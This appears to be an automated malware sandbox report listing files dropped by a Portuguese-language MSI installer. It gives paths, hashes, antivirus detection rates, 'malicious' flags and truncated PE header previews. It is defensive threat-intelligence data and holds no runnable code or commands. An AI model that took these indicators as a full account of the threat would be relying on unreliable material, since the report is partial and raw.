                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1104320
                                                Entropy (8bit):6.780325304604232
                                                Encrypted:false
                                                SSDEEP:24576:4RUAajZN8sD7SpFR31LziUkiQQ2oSyQsZMWu4taJ62LPj:OUAq2ZgJsZMW4J62Lb
                                                MD5:436671A4DCE78AE4ECC22924984D301C
                                                SHA1:B8563D24C175092B182039E787EA291FBF7F808A
                                                SHA-256:E1173137F4D966E13C7C7A6ACDEA6579FE569E565109B006FA9F8ADCBBB2F1E7
                                                SHA-512:CC6BF278395D8164CBAEA95460883489B0E72869501FC9E26CC3E4504438185F580AFB92FD48B03C033B85D963C747A049B5D10690AD96F68F551D96D9E28EF1
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....d.........."..................-............@.................................t.....@.................................t........p...................'...... .......8...................p.......p...............................................text............................... ..`.rdata...4.......6..................@..@.data....@.......@..................@....00cfg.......P.......$..............@..@.tls.........`.......&..............@....rsrc........p.......(..............@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\EpIiyF\GAaICB\msedge_elf.dll (copy)

                                                Download File
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):696320
                                                Entropy (8bit):5.001884713402906
                                                Encrypted:false
                                                SSDEEP:6144:C3io/BDk0Rt2BYo4uYV/dGMteGLvhd34Bfu0+WF45or6RDP1KeaIQSsAoVG35nMm:6HT/feIDZ0145oIKrSqG3mcz
                                                MD5:D66B81737870280BAF467A9F88DC7A96
                                                SHA1:9A08589D7FB1AF14515B4FEEBCBB3C500689A85C
                                                SHA-256:3B8D1345D2EFFA73C62D7E3296122BC66B8FCEACBCEC24E7B37FD8D39F49ECF0
                                                SHA-512:0885A76500D72B67242F84B69559709AE26D4D49E9430685A3879FDD7AC858F559C371B10435D6C3FC71C00B770BB4328D718B8589CC77D13974440303AEBEBC
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 11%
                                                • Antivirus: Virustotal, Detection: 12%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.Df...........!..................... ........... ....................... ............@.............................(...|...O.... ..x....................@....................................................... ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...x.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\EpIiyF\GAaICB\msedge_elf.dll.exe (copy)

                                                Download File
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):696320
                                                Entropy (8bit):5.001884713402906
                                                Encrypted:false
                                                SSDEEP:6144:C3io/BDk0Rt2BYo4uYV/dGMteGLvhd34Bfu0+WF45or6RDP1KeaIQSsAoVG35nMm:6HT/feIDZ0145oIKrSqG3mcz
                                                MD5:D66B81737870280BAF467A9F88DC7A96
                                                SHA1:9A08589D7FB1AF14515B4FEEBCBB3C500689A85C
                                                SHA-256:3B8D1345D2EFFA73C62D7E3296122BC66B8FCEACBCEC24E7B37FD8D39F49ECF0
                                                SHA-512:0885A76500D72B67242F84B69559709AE26D4D49E9430685A3879FDD7AC858F559C371B10435D6C3FC71C00B770BB4328D718B8589CC77D13974440303AEBEBC
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 11%
                                                • Antivirus: Virustotal, Detection: 12%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.Df...........!..................... ........... ....................... ............@.............................(...|...O.... ..x....................@....................................................... ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...x.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\EpIiyF\GAaICB\senhor.exe

                                                Download File
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1104320
                                                Entropy (8bit):6.780325304604232
                                                Encrypted:false
                                                SSDEEP:24576:4RUAajZN8sD7SpFR31LziUkiQQ2oSyQsZMWu4taJ62LPj:OUAq2ZgJsZMW4J62Lb
                                                MD5:436671A4DCE78AE4ECC22924984D301C
                                                SHA1:B8563D24C175092B182039E787EA291FBF7F808A
                                                SHA-256:E1173137F4D966E13C7C7A6ACDEA6579FE569E565109B006FA9F8ADCBBB2F1E7
                                                SHA-512:CC6BF278395D8164CBAEA95460883489B0E72869501FC9E26CC3E4504438185F580AFB92FD48B03C033B85D963C747A049B5D10690AD96F68F551D96D9E28EF1
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....d.........."..................-............@.................................t.....@.................................t........p...................'...... .......8...................p.......p...............................................text............................... ..`.rdata...4.......6..................@..@.data....@.......@..................@....00cfg.......P.......$..............@..@.tls.........`.......&..............@....rsrc........p.......(..............@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\EpIiyF\GAaICB\senhora.exe

                                                Download File
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):696320
                                                Entropy (8bit):5.001884713402906
                                                Encrypted:false
                                                SSDEEP:6144:C3io/BDk0Rt2BYo4uYV/dGMteGLvhd34Bfu0+WF45or6RDP1KeaIQSsAoVG35nMm:6HT/feIDZ0145oIKrSqG3mcz
                                                MD5:D66B81737870280BAF467A9F88DC7A96
                                                SHA1:9A08589D7FB1AF14515B4FEEBCBB3C500689A85C
                                                SHA-256:3B8D1345D2EFFA73C62D7E3296122BC66B8FCEACBCEC24E7B37FD8D39F49ECF0
                                                SHA-512:0885A76500D72B67242F84B69559709AE26D4D49E9430685A3879FDD7AC858F559C371B10435D6C3FC71C00B770BB4328D718B8589CC77D13974440303AEBEBC
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 11%
                                                • Antivirus: Virustotal, Detection: 12%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.Df...........!..................... ........... ....................... ............@.............................(...|...O.... ..x....................@....................................................... ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...x.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\6625d7.msi

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {98FE3458-F15D-4F62-81E0-574992C1406B}, Number of Words: 10, Subject: LLIFIIIIRK IIRIRIR, Author: LLIFIIIIRK IIRIRIR, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1046, Comments: A base dados do instalador contm a lgicaLLIFIIIIRK IIRIRIRcessrios para instalar o LLIFIIIIRK IIRIRIR., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                Category:dropped
                                                Size (bytes):5453039
                                                Entropy (8bit):7.596833709557238
                                                Encrypted:false
                                                SSDEEP:98304:TxMiAtKknz5vqursRe4frUMXjcYusLgi2I0QxYvLH7sK4mGTxgcVU8XkPdYU:TAYursRVje+gNOUH4NnVU8XG
                                                MD5:213FC1BE9B6AF3BED890F19A6747BF26
                                                SHA1:284E9D99D24731D889373752567E0E3FF2CF92E4
                                                SHA-256:236A03C3345F710B5D137E9AE3298847ED83E61DE998F5B600AC440CCCC4FC23
                                                SHA-512:93B1562DEAAED6BCB96CF61F75DF994D97C9193DFCFDA055809A2420A19434EEADBD5A56DF2FD09FA0E9E95518932ADB025C6EC5EEF6F77B3FA3BE450E2302A8
                                                Malicious:false
                                                Preview:......................>...................'...................................................................................................................J...K...L...M...N...O...P...Q...R...S...T...U...............................................................................................................................................................................................................................................................................................................................c...............%...8........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...6...2...3...4...5...9...7...@...C...:...;...<...=...>...?...R...A...B...H...D...E...F...G...p...a...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`.......b...d...u...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...v.......w...x...y...z...

                                                C:\Windows\Installer\MSI270F.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):780768
                                                Entropy (8bit):6.387720196228063
                                                Encrypted:false
                                                SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                MD5:573F5E653258BF622AE1C0AD118880A2
                                                SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\MSI278D.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):388064
                                                Entropy (8bit):6.407392408414975
                                                Encrypted:false
                                                SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                MD5:20C782EB64C81AC14C83A853546A8924
                                                SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\MSI279E.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):388064
                                                Entropy (8bit):6.407392408414975
                                                Encrypted:false
                                                SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                MD5:20C782EB64C81AC14C83A853546A8924
                                                SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\MSI27CE.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):388064
                                                Entropy (8bit):6.407392408414975
                                                Encrypted:false
                                                SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                MD5:20C782EB64C81AC14C83A853546A8924
                                                SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\MSI27FE.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):878560
                                                Entropy (8bit):6.452749824306929
                                                Encrypted:false
                                                SSDEEP:24576:QK8S3AccKkqSojmrhCMou5vk3Y+ukDln/hFRFNUEekB:QK8tKk5ojmrhCMz5vk3ukDln/hFRFNU0
                                                MD5:D51A7E3BCE34C74638E89366DEEE2AAB
                                                SHA1:0E68022B52C288E8CDFFE85739DE1194253A7EF0
                                                SHA-256:7C6BDF16A0992DB092B7F94C374B21DE5D53E3043F5717A6EECAE614432E0DF5
                                                SHA-512:8ED246747CDD05CAC352919D7DED3F14B1E523CCC1F7F172DB85EED800B0C5D24475C270B34A7C25E7934467ACE7E363542A586CDEB156BFC484F7417C3A4AB0
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j{..............`.......`..W...<.......<.......<.......`.......`.......`..............>.......>.......>...............>.......Rich....................PE..L...}.`.........."!.........|...........................................................@............................t...T........................N..............X}..p....................~.......}..@............................................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc................^..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\MSI3378.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):780768
                                                Entropy (8bit):6.387720196228063
                                                Encrypted:false
                                                SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                MD5:573F5E653258BF622AE1C0AD118880A2
                                                SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\MSI33A8.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):780768
                                                Entropy (8bit):6.387720196228063
                                                Encrypted:false
                                                SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                MD5:573F5E653258BF622AE1C0AD118880A2
                                                SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\MSI3445.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):388064
                                                Entropy (8bit):6.407392408414975
                                                Encrypted:false
                                                SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                MD5:20C782EB64C81AC14C83A853546A8924
                                                SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\MSI3475.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):780768
                                                Entropy (8bit):6.387720196228063
                                                Encrypted:false
                                                SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                MD5:573F5E653258BF622AE1C0AD118880A2
                                                SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\MSI34C4.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):2577
                                                Entropy (8bit):5.4360124386342745
                                                Encrypted:false
                                                SSDEEP:48:AjfLLA4CdIw+r1AX6iI4EnOsj9F9CtfrKETEM7rYmLTDK:A7Atd8r1i6ixEfj9F9yfrKETEJmLvK
                                                MD5:5F180AAC397E3D9818AA90E249D9C4A4
                                                SHA1:769F215BA24D033C19B9FC85662F6EDB5E2C4585
                                                SHA-256:B5DFB093322C6F875B3BF7F9DEFE673C45421A5BF93AC5169029AF5975199046
                                                SHA-512:F93A4F67C58A4F65F0A5AC01F40088006EE2049C4394A471C156D1F2B728021496D73BD06CE6D797446FC4D62A5D9BE56EB83982E420095366EB782DED9ABB62
                                                Malicious:false
                                                Preview:...@IXOS.@.....@.%.X.@.....@.....@.....@.....@.....@......&.{40A711E6-C815-4EE1-AD60-1310D3F6EABC}..LLIFIIIIRK IIRIRIR..2ztvLMT477.msi.@.....@.....@.....@........&.{98FE3458-F15D-4F62-81E0-574992C1406B}.....@.....@.....@.....@.......@.....@.....@.......@......LLIFIIIIRK IIRIRIR......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{66738479-D8D4-4DEB-B591-26EF31BEBB5C}F.C:\Users\user\AppData\Roaming\LLIFIIIIRK IIRIRIR\LLIFIIIIRK IIRIRIR\.@.......@.....@.....@......&.{5C236B17-1136-4D84-9DE6-3B3077246439}:.01:\Software\LLIFIIIIRK IIRIRIR\LLIFIIIIRK IIRIRIR\Version.@.......@.....@.....@......&.{653D396A-09C8-4A60-8D5B-FC28B86EE76B}S.01:\Software\LLIFIIIIRK IIRIRIR\{40A711E6-C815-4EE1-AD60-1310D3F6EABC}\AI_IA_ENABLE.@.......@.....@.....@........CreateFolders..Criando novas pastas..Pasta: [1]".F.C:\Users\user\AppData\Roaming\L

                                                C:\Windows\Installer\MSI88B2.tmp

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):780768
                                                Entropy (8bit):6.387720196228063
                                                Encrypted:false
                                                SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                MD5:573F5E653258BF622AE1C0AD118880A2
                                                SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\SourceHash{40A711E6-C815-4EE1-AD60-1310D3F6EABC}

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.1643495472097571
                                                Encrypted:false
                                                SSDEEP:12:JSbX72Fjq0liAGiLIlHVRpZh/7777777777777777777777777vDHFcn3pAtit/z:JM0IQI5t7AiF
                                                MD5:D7BB9A91CAAD36FA8ED8D34ABF27996F
                                                SHA1:B917CB96EB129220C15549659ED83426E8DED0A6
                                                SHA-256:375FEF25FECEE46FA88B471E29CD936A2429A83E54AE0C835684828EB3FC6F79
                                                SHA-512:85365FB4467CF4DA6A0521334F774BF5840A2C034024AEDB257DA57FAA133E70A9E7E6B1DA0B8BED1C31CE811793459FF51D6E78B2F5920E5E8829EF5F9B99F4
                                                Malicious:false
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Windows\Installer\inprogressinstallinfo.ipi

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):24576
                                                Entropy (8bit):1.8447018010154044
                                                Encrypted:false
                                                SSDEEP:48:2S8PhUuRc06WXJWFT5mqteHyvSHAErCyFc8xfoHswXGcp4ru2xBxYxMxqxrxbxE3:yhU1tFToqcHaBwCYco2WGI9
                                                MD5:FD30B6096437EB7029AD78BD1C5D8916
                                                SHA1:C8416EFC2DA011D6BA69DC4FA9D790E54F43D569
                                                SHA-256:3B4B5BABFBB1E75F0BC23DF89417B6F901B71A969CD25A14B6357D62A8384D22
                                                SHA-512:3E6867D1538C548F5F22846560F4AFCCDCE4BF7EEB521BF1E429E239FF105B7F263D71387EBBDED5B75D16F9CC6AAF5C91121F957BC2998C5FE17960EAFF7C21
                                                Malicious:false
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                Download File
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):364484
                                                Entropy (8bit):5.365501201794277
                                                Encrypted:false
                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauN:zTtbmkExhMJCIpEm
                                                MD5:4130153D4AB2C64FEEB56BA1C8AB2D8E
                                                SHA1:C92EAC477AE7C6A63688C231DAF076197A30CA44
                                                SHA-256:C4422792E7E8BDF31F0BE08037CF9F0BD60C75F526BBAAD6FFD902B98A4F8B72
